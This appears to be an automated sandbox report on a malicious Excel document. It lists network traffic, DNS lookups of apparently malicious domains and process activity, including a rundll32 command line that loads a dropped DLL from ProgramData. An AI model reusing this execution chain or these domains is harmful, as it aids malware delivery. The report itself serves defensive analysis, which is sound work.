,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 26, 2021 21:31:56.169456005 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.190820932 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.190928936 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.204083920 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.225495100 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.230417967 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.230457067 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.230489969 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.230520010 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.238967896 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.261523008 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.261800051 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.261861086 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.455630064 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.477003098 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.606843948 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.606890917 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.606930971 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.606942892 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.606966019 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.606971025 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.606976032 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607007980 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607009888 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607044935 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607054949 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607094049 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607100964 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607136965 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607139111 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607176065 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607466936 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607508898 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607516050 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607553959 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.607558966 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.607785940 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.608189106 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.608227015 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.608241081 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.608258963 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.629709005 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.630661964 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.630690098 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.630722046 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.630736113 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.675189972 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675234079 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675272942 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675299883 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675421000 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.675453901 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675493002 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675523043 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.675529003 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.675559044 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.675595045 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.675982952 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676024914 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676055908 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.676063061 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676085949 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.676120043 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.676805973 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676846981 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676871061 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.676896095 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.676908016 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.676970005 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.677544117 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.677583933 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.677623034 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.677629948 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.677658081 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.677691936 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.678010941 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.678253889 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.678297043 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.678333998 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.678344011 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.678370953 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.678400993 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.678982019 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.679023981 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.679059029 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.679063082 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.679086924 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.679131985 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.679848909 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.679913998 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.685857058 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.685889006 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.685924053 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.685946941 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.685961008 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.685964108 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.686037064 CET49167443192.168.2.22172.67.150.228
                                              Jan 26, 2021 21:31:56.723650932 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.723696947 CET44349167172.67.150.228192.168.2.22
                                              Jan 26, 2021 21:31:56.723746061 CET44349167172.67.150.228192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 26, 2021 21:31:56.141288996 CET5219753192.168.2.228.8.8.8
                                              Jan 26, 2021 21:31:56.157478094 CET53521978.8.8.8192.168.2.22
                                              Jan 26, 2021 21:32:29.435168982 CET5309953192.168.2.228.8.8.8
                                              Jan 26, 2021 21:32:29.451072931 CET53530998.8.8.8192.168.2.22
                                              Jan 26, 2021 21:32:30.448050976 CET5283853192.168.2.228.8.8.8
                                              Jan 26, 2021 21:32:30.467240095 CET53528388.8.8.8192.168.2.22
                                              Jan 26, 2021 21:32:31.318912029 CET6120053192.168.2.228.8.8.8
                                              Jan 26, 2021 21:32:31.397614956 CET53612008.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 26, 2021 21:31:56.141288996 CET192.168.2.228.8.8.80x1168Standard query (0)rnollg.comA (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:29.435168982 CET192.168.2.228.8.8.80xdda9Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:30.448050976 CET192.168.2.228.8.8.80xe9adStandard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:31.318912029 CET192.168.2.228.8.8.80xb0d5Standard query (0)govemedico.tkA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 26, 2021 21:31:56.157478094 CET8.8.8.8192.168.2.220x1168No error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:31:56.157478094 CET8.8.8.8192.168.2.220x1168No error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:29.451072931 CET8.8.8.8192.168.2.220xdda9No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:29.451072931 CET8.8.8.8192.168.2.220xdda9No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:30.467240095 CET8.8.8.8192.168.2.220xe9adNo error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:30.467240095 CET8.8.8.8192.168.2.220xe9adNo error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:31.397614956 CET8.8.8.8192.168.2.220xb0d5No error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)
                                              Jan 26, 2021 21:32:31.397614956 CET8.8.8.8192.168.2.220xb0d5No error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)

                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Jan 26, 2021 21:31:56.230457067 CET172.67.150.228443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                              Jan 26, 2021 21:32:29.548986912 CET172.67.200.147443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                              Jan 26, 2021 21:32:30.505657911 CET104.21.60.169443192.168.2.2249169CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                              Jan 26, 2021 21:32:31.456872940 CET104.21.73.69443192.168.2.2249170CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:21:31:40
                                              Start date:26/01/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13fbe0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:31:46
                                              Start date:26/01/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                              Imagebase:0xff4d0000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:21:31:46
                                              Start date:26/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                              Imagebase:0x390000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:21:32:14
                                              Start date:26/01/2021
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:msiexec.exe
                                              Imagebase:0x510000
                                              File size:73216 bytes
                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >